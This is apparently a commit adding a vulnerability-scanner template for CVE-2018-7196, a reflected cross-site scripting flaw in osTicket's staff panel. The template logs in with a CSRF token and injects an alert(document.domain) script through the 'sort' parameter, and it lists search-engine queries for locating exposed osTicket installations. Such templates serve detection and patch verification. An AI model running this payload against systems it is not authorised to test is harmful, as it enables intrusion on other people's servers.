Create CVE-2018-7196.yaml
Ritik Chaddha
GitHub
parent
5f49c79ba5
commit
86b6be6a28
|
|
@ -0,0 +1,72 @@
|
||||||
|
id: CVE-2018-7196
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: osTicket < 1.10.2 - Cross-Site Scripting
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter.
|
||||||
|
impact: |
|
||||||
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
|
||||||
|
remediation: |
|
||||||
|
Upgrade osTicket to later version to mitigate this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7196
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2018-7196
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
vendor: osticket
|
||||||
|
product: osticket
|
||||||
|
shodan-query: title:"osTicket"
|
||||||
|
fofa-query: title="osticket"
|
||||||
|
google-query: intitle:"osticket"
|
||||||
|
tags: cve,cve2018,osticket,xss,authenticated
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /scp/login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(tolower(body), "osticket")'
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrftoken
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '__CSRFToken__" value="(.*?)"'
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /scp/login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /scp/index.php?sort="><script>alert(document.domain);</script>&dir=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "\"><script>alert(document.domain);</script>")'
|
||||||
|
- 'contains(header, "text/html")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
Loading…
Reference in New Issue